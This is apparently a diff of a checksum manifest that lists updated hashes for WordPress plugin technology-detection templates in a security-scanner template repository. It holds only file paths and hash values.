+http/technologies/wordpress/plugins/formidable.yaml:3aa3e2074f5d8a5b508a72721d6f8a4563bce2c6 +http/technologies/wordpress/plugins/forminator.yaml:89ff115c05980ae36f8d02adc7c26e0cd91583b6 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:03a211e3ab83e47e066dc155ec58edbedffdbc58 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:3b4e705264305caf2737782f0131a11c13f0422e http/technologies/wordpress/plugins/give.yaml:fc2d82b805174c1b02d60efd47f286cc8d3aceb5 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:2ce79134ffd98a0c7bb988b09009dc18a4677a90 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:056d7b8b1afbe48869dce6091c87521f35ee839e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:3a03a9245b1042183a9dd35db3a0f7f5795940a0 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:9a22b2028fb0cf4550c038f235c49641abb18fe5 +http/technologies/wordpress/plugins/google-site-kit.yaml:32b24a766151c4b56490b7387a4378b54c3ac81c +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:6ebe7945994ff0e64b0410fa5e53a3ca7e929944 +http/technologies/wordpress/plugins/gtranslate.yaml:4d524eb9fa6fe60fd6c817794830c68c54e5b4ea +http/technologies/wordpress/plugins/gutenberg.yaml:181c1b213c2663d4d293b82f22a32c574d7b7ddc +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:5bd80dc4a15bf99a36eccd77c2f7e6f49340bd20 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:1c6be6bc344e532324a2ddd3909f1a894db83bd8 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:ccff30863c18f64296cdef268b4df44a0a8afaf2 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:dd69233ce1b9900da7bf6f5fbe7a08619f529395 +http/technologies/wordpress/plugins/header-footer.yaml:233f55b73e20c0705684bc432ee70213bc02826e +http/technologies/wordpress/plugins/health-check.yaml:5f8ff932c18f2c242d16c590cbdf6e4b04812e61 +http/technologies/wordpress/plugins/hello-dolly.yaml:89680e8c58c51db178688efd91811198138df030 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:87593452ac76bff463359eabbf2eb598a7f9ad8b +http/technologies/wordpress/plugins/hostinger.yaml:2a4532819b78357d4fc4e398a90096e129f68c95 +http/technologies/wordpress/plugins/image-optimization.yaml:92d555e6b0bbd6b013d540b4193337f306f4d2b5 +http/technologies/wordpress/plugins/imagify.yaml:14e470f789410b07e2308dd2f9d7238155f93f05 http/technologies/wordpress/plugins/imsanity.yaml:319c06bed3d7611b6a05e2aaa77fb998a3205778 http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml:7544703f23942190d32f575fe3f4b1398dfa3260 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:11af5ee002c31fe529de4d21dd56b914f8b57c16 +http/technologies/wordpress/plugins/instagram-feed.yaml:5102f1d994f9ce6d600ec06c3e420ba0c590739e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:c16a8a901698998daaeea7d1c47f39dcdb8e7911 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:ac920e5fd6d7fe1620d7d0c27c3a2584df6889f6 +http/technologies/wordpress/plugins/jetpack.yaml:83f7816dfcf7931e667cce07f680882601ea4818 +http/technologies/wordpress/plugins/kadence-blocks.yaml:d14caa5611b7b66cdfa9a5f9dee2ae1098f0348a +http/technologies/wordpress/plugins/kirki.yaml:f10a1d3ad57415494954cc3023b7832a962cc3f6 +http/technologies/wordpress/plugins/leadin.yaml:dcaa5495b4a7074e0b25c26193375dcc7ca1d4d5 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:74656a111ae9b7aa45840db830bb37fa7520cd3a +http/technologies/wordpress/plugins/limit-login-attempts.yaml:00c8d37fabe25ecc50a211ae2602d3a3096858c3 +http/technologies/wordpress/plugins/litespeed-cache.yaml:af80a09b0cd496cf28223e480e6557cce58c25ce +http/technologies/wordpress/plugins/loco-translate.yaml:04dceb4582be6e2ed8433d3262a7c5adfc49e7df +http/technologies/wordpress/plugins/loginizer.yaml:bc63aa405c52ac2ca208fe1287571f6a9137be0c http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:c274f39e569adf0c41b69c94e3e3d6cf50b43817 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:2fb6e282504f3ab516bf8dda5fa84624bec49aea -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:e805aa0f24118a419ba698e01f4040c3e021358d -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:a6142088e99a084475dab84887b0db8be0457b19 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:ed4ce2a39d8888755ec499bcf49a8aa6cb1817e0 +http/technologies/wordpress/plugins/mailpoet.yaml:1564298bee8b1436ab1a772361ee910bd56a6687 +http/technologies/wordpress/plugins/maintenance.yaml:88efe1343890f65ca1fe5b968124534b17efb595 +http/technologies/wordpress/plugins/mainwp-child.yaml:897211bda8ba19d307a3e5bfa0a24154475195b8 +http/technologies/wordpress/plugins/malcare-security.yaml:4b1fc042838b57e0b272ce3349a67af2d682c60e +http/technologies/wordpress/plugins/megamenu.yaml:7c694e3c7895905af50e29ea556a15c6b3c8fad7 +http/technologies/wordpress/plugins/members.yaml:bba0b0ae4f3af85d5ad23c9baec6d63372eff35c +http/technologies/wordpress/plugins/meta-box.yaml:56a60fac7c70dc6b600546fe5024a4a6a0dc188a +http/technologies/wordpress/plugins/metform.yaml:7fa02cdbb38c4cefbcea5521cedbcc3fa41d3a9b +http/technologies/wordpress/plugins/ml-slider.yaml:a9966ca5c780375d26330ef98879e693045dd0b8 +http/technologies/wordpress/plugins/newsletter.yaml:663b4d88e93c6f7ac1d8660b4d8dda07ac297ccd +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:8c3c4047d133e402525da574200c6e0c0ba7e0ec +http/technologies/wordpress/plugins/nextgen-gallery.yaml:c451c5af4795fe8f4f4176d1662c674b1c0734e6 +http/technologies/wordpress/plugins/ninja-forms.yaml:7723a5aa454919323b8b11a125c32857a0930b97 +http/technologies/wordpress/plugins/ocean-extra.yaml:33ee4b98735c233736c903a9e9c9c8a602fd34e3 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:287e7afb798a403de0fec75b52420dfaf4290f1e +http/technologies/wordpress/plugins/one-click-demo-import.yaml:f550ed6bf4b44259c5d0fe08b7d4f3db8a52e62d +http/technologies/wordpress/plugins/optinmonster.yaml:f58759a8e113be05ccfc8e695c32828e206f4bf8 +http/technologies/wordpress/plugins/otter-blocks.yaml:c323cfd95a92313cb0f4a315d62c2a454e1bc66a +http/technologies/wordpress/plugins/password-protected.yaml:fe8c50d93268582c151d57b15222b9613ea819b0 +http/technologies/wordpress/plugins/pdf-embedder.yaml:9cfd8c2c2690706f7f43dbfacfb4f8f88f35e2b6 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:3a92994823f55a35f83a9f7981e0af7afa8deaf4 +http/technologies/wordpress/plugins/pixelyoursite.yaml:a3fa223e51a425af754b6df75d49f683e167b02b +http/technologies/wordpress/plugins/polylang.yaml:59a75ab5c74d3fb550334784f47cc1cdd914db6f http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:020ac98ee8b37e204e0935108f9d69e52db78397 -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:e65eba15ab4cc9cee64f0df4143fa8c254e858fb +http/technologies/wordpress/plugins/post-smtp.yaml:0045f7325b47246739a83003ddda006bb3d2535d +http/technologies/wordpress/plugins/post-types-order.yaml:19f93bc32ed9ef24c3913a6a5eed8f91937de32d +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:8aa280e2dba3240d287f2220353889a43dbf1e3f +http/technologies/wordpress/plugins/pretty-link.yaml:a05dd32ba638f8c2a21616c586590935fad4cbf8 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:406a96ff7af248036742b470bf33aa890d5aa8a7 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:e2f79040288f4dbbc1cc2aa19413940cd76da8d3 +http/technologies/wordpress/plugins/redirection.yaml:b104e7c97a397f5419cb3a4034a1d3534bf38e0d +http/technologies/wordpress/plugins/redux-framework.yaml:f8f3d673ee5775c64d3a5d896ffbe3351f4a9236 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:cff8f6bd1d71142370b330c4c4d985275149e895 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:45049e21f802d000dd05a2161af0f46a3606e62f +http/technologies/wordpress/plugins/safe-svg.yaml:73bc6a488d6889c287be592792a6615ba8a88f8f +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:19a4f938c91c1de9b7faed269ffa80bbdf24e413 +http/technologies/wordpress/plugins/sg-cachepress.yaml:e7083e166d8d0323a17ac3bf2159ef348e56e747 +http/technologies/wordpress/plugins/sg-security.yaml:a17daecdb2dac74eb91e6fdff35890f6cdb963af +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:8e63168e0333865420c6f8284dc57a6c4293d871 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1740abbb0efabec55402b0dac330dfdbd0626954 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:bd85d3af9568a82e1182fe49b8c848be682fb17a +http/technologies/wordpress/plugins/simple-history.yaml:f66d512367509526317dbda897e21f767d0c2551 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:1b506638fa568e33eb4b4d431ac50441e4d2f943 -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:62978e0ae520e556ffa6f70bc928abbc02e794a9 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:68d86fc248b0d7cd82f76893606532d4520634cb +http/technologies/wordpress/plugins/smart-slider-3.yaml:ef6fb0b703f0cc77368868a89b3d2a711c88d722 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:d522f9538fd0a99aabdb0fa0586a357a76e70c85 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b0de378b1d33c720aa432a755b9f5d9aa3a5e577 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:da7c2c2ee325e7cfa91d8cd8fdc278810151e3f9 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:dc5b37057a031ca9838be5d877b33c265e845f19 +http/technologies/wordpress/plugins/svg-support.yaml:4389f73ab6c6dea05ae81f70ed972196b4f67f6d http/technologies/wordpress/plugins/table-of-contents-plus.yaml:142cf7dc3d34ed35422ad91447b3f1f986d965b6 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/tablepress.yaml:cde6ed4a85f31309c5aa531c0fbbd27003dbe7d1 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a1ec7f94bb4156bb27cb4abd94a562952cdf6e69 +http/technologies/wordpress/plugins/templately.yaml:375a077548a644291a4078b26c78fc62f03c702a +http/technologies/wordpress/plugins/the-events-calendar.yaml:02af719e9bd4c86b2980ba41d99fb6b2ea2f5f40 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:bf3681282ebb6f2e6f6c2b0bd771099f48c18ac5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:ffc5da16590d07969e98e5f5554c66f491447b95 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:38edb89cfcb6e5d3f088879a31a8271e9b3ad159 +http/technologies/wordpress/plugins/under-construction-page.yaml:bb8f0353406248bce15c9b4bfbacdcbe133caa62 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:9f792b6f3cffd596c4811d95eb1eec6741507192 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:3cacca92b6ed6305e1264dd761705458d64eab3d http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/w3-total-cache.yaml:b0b44dee75cfa050a2a6cd70f5c791fca4b112ea +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:e40db0d83d160ccf5e792ccfc282940f98b16fba +http/technologies/wordpress/plugins/webp-express.yaml:8a75fee3d134d892d14e2a3b6afea38ed4cceb2e http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:07803614b6573b619f3ed791fa5625e935f7e3ca +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0fbe62307a61913b31c83b0dfebb6ae9339c0fe0 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:c2c51c81bc016d8ea059c7ddac100286b846f318 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:090e8810208a527a148100660fdb9936763447b0 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:ef9dc93bc91c4616a2adfde95e8daf9d646837d9 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d92cad60acaad36b1f120e1db00dfe044554d71a +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:9bd8eb7941fce1bf03a971be46b414076aac9de1 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e9b2ad8b05b26dd90f1c9505b47cfad0b1c2fb0a +http/technologies/wordpress/plugins/woocommerce-services.yaml:d5f3d580c8c51856429e877049559654906a2b24 +http/technologies/wordpress/plugins/woocommerce.yaml:aef501a02c52c0e8326ef6c19f8d347150d15d47 +http/technologies/wordpress/plugins/wordfence.yaml:ba7beb8f1687ffd2703d0388f9394e203f19291a +http/technologies/wordpress/plugins/wordpress-importer.yaml:f82f2cada9bedf274b2b7c8c5ed5c4f35f7616f2 +http/technologies/wordpress/plugins/wordpress-seo.yaml:35629696f21bfc85db76a01c0daf2bfa8a9a94e2 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-logging.yaml:43cc5e8e1534e83039984a4f1affb3c2552fe63f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:10b7d3c96ef44d16cc9ab5da9eeed5395f11396d +http/technologies/wordpress/plugins/worker.yaml:dbbd98bfa519866439545a829b3b4c9f23a80493 +http/technologies/wordpress/plugins/wp-crontrol.yaml:966864c5220a4b9fc0937bae5601c962cd91a0b2 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3604dc47debc9b7b5f34847b3026731b82ca145e +http/technologies/wordpress/plugins/wp-file-manager.yaml:23f869ec905a61347aaafa61d5c18fc99f194b47 +http/technologies/wordpress/plugins/wp-google-maps.yaml:deb67ea682e1538fd52c9015664369476bd09a18 +http/technologies/wordpress/plugins/wp-mail-logging.yaml:fededd8bba3d0deb3ddb1310d21739e186145993 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:c340ca1428e6e151c45fbee8a0ad54986960985b +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:b69b7c8b1eb7b32937017a39894b70f48e440a4a http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:cbf8a72a951934b90dba22b9cb6d7603483bef25 +http/technologies/wordpress/plugins/wp-optimize.yaml:f5d05af2602337f8b7ad7793f5edafaf80654a55 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:ee5207f6a2b828e574ada1b287d7a0ea2cf2c1fb 